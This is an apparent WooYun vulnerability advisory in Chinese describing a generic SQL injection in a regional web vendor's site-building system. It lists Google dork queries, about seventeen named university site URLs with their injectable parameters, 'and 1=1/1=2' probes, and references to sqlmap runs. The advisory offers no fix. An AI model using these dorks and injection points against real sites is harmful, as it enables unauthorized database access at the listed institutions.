当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061704

漏洞标题:某省教育门户建站系统通用SQL注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者:

提交时间:2014-05-22 23:23

修复时间:2014-08-20 23:26

公开时间:2014-08-20 23:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-22: 细节已通知厂商并且等待厂商处理中
2014-05-27: 厂商已经确认,细节仅向厂商公开
2014-05-30: 细节向第三方安全合作伙伴开放
2014-07-21: 细节向核心白帽子及相关领域专家公开
2014-07-31: 细节向普通白帽子公开
2014-08-10: 细节向实习白帽子公开
2014-08-20: 细节向公众公开

简要描述:

SQL注入

详细说明:

陕西新势力网络科技有限公司(官网:http://www.xinpop.cn/)
业务范围:公司始终致力于政府、学校、企事业单位、个人等互联网信息服务及软件提供商。在西部地区率先开创了以“服务+运营”模式实现客户信息化的解决方案。业务范围为:网站建设软件开发,域名注册、虚拟主机、服务器托管维护、网站推广、计算机网络信息技术服务;设计、制作、发布、代理国内外各类广告等。

http://www.xinpop.cn/Customer_Example.html 官网案例
这个建站公司很是蛋疼,有的存在漏洞的文件相同注入参数也相同,有的文件不同但注入参数相同,我都不知道怎么google了 - -
注入点基本存在新闻或者通知公告处
下面我仅列举一些edu.cn下存在注入的站点


google搜索
1.【技术支持:新势力网络 inurl:shownews.asp?newsid 】
2.【技术支持:新势力网络 inurl:shownews.asp?id 】
存在漏洞的文件:shownews.asp ,newsid与id参数都存在注入
http://jwc.xinpop.com.cn/shownews.asp?pkId=103&newsid=1419 长安大学教务处【技术支持:新势力网络】
http://smesy.xidian.edu.cn/shownews.asp?newsid=1090 西安电子科技大学微电子学院实验教学中心【技术支持:新势力网络】
http://nec.snnu.edu.cn/shownews.asp?id=372 陕西师范大学民族研究中心【技术支持:新势力网络】
http://www.shanxi185.com/shownews.asp?id=1491 陕西省煤田地质局一八五队【技术支持:新势力网络】
http://tiyubu.xpu.edu.cn/shownews.asp?id=417 西安工程大学体育部 【技术支持:新势力网络】
还有一些网站有安全狗或者防注入,我就不列出来了..


google搜索【技术支持:新势力网络 inurl:asp? site:edu.cn】
文件不同,但是id参数都存在注入的站点:
http://www.xsc.snnu.edu.cn/YuanBu_elegant_demeanour.asp?id=17&bh=10919 陕西师范大学学生处【技术支持:新势力网络】
http://jw.xpu.edu.cn/Teachers_service.asp?id=20&bh=133 西安工程大学教务处【技术支持:新势力网络】
http://www.wyxy.snnu.edu.cn/News.asp?id=18&bh=114 陕西师范外国语学院【技术支持:新势力网络】
http://biology.nwu.edu.cn/College_News.asp?id=25&bh=591 西北大学生命科学学院【技术支持:新势力网络】
http://ysxy.nwu.edu.cn/News_Center.asp?id=137&bh=249 西北大学艺术学院【技术支持:新势力网络】
http://mainpage2.nwu.edu.cn/cjy/Dynamic_test.asp?id=38&bh=40 西北大学继续教育学院【技术支持:新势力网络】
http://gzc.xidian.edu.cn/Download_Center.asp?bh=98&id=23 西安电子科技大学国有资产管理处【技术支持:新势力网络】
http://www.ibs.snnu.edu.cn/Student_worker_dynamic.asp?id=31&bh=816 陕西师范大学国际商学院 【技术支持:新势力网络】
http://math.xidian.edu.cn/The_News.asp?id=36&bh=155 西安电子科技大学数学与统计学院 【技术支持:新势力网络】
http://sklsp.nwpu.edu.cn/Shiyanshi_News.asp?id=13&bh=95 西北工业大学凝固技术国家重点实验室【技术支持:新势力网络】
http://jijianchu.snnu.edu.cn/Work_dynamic.asp?id=16&bh=298 陕西师范大学基建处【技术支持:新势力网络】
http://whe.xaut.edu.cn/Notice.asp?id=25&bh=440 西安理工大学水利水电学院【技术支持:新势力网络】


http://jwc.xinpop.com.cn/shownews.asp?pkId=103&newsid=1419 and 1=1


a1.jpg


http://jwc.xinpop.com.cn/shownews.asp?pkId=103&newsid=1419 and 1=2


a2.jpg


http://smesy.xidian.edu.cn/shownews.asp?newsid=1090 and 1=1


a3.jpg


http://smesy.xidian.edu.cn/shownews.asp?newsid=1090 and 1=2


a4.jpg


网站下方都有 技术支持:新势力网络
cc.jpg

漏洞证明:

sqlmap演示1:http://jwc.xinpop.com.cn/shownews.asp?pkId=103&newsid=1419


z1.jpg


sqlmap演示2:http://smesy.xidian.edu.cn/shownews.asp?newsid=1090


c2.jpg


sqlmap演示3:http://nec.snnu.edu.cn/shownews.asp?id=372


c4.jpg


sqlmap演示4:http://www.shanxi185.com/shownews.asp?id=1491


c5.jpg


修复方案:

如果有更好的google关键字求告知我涨涨姿势..

版权声明:转载请注明来源 @乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-05-27 14:10

厂商回复:

最新状态:

暂无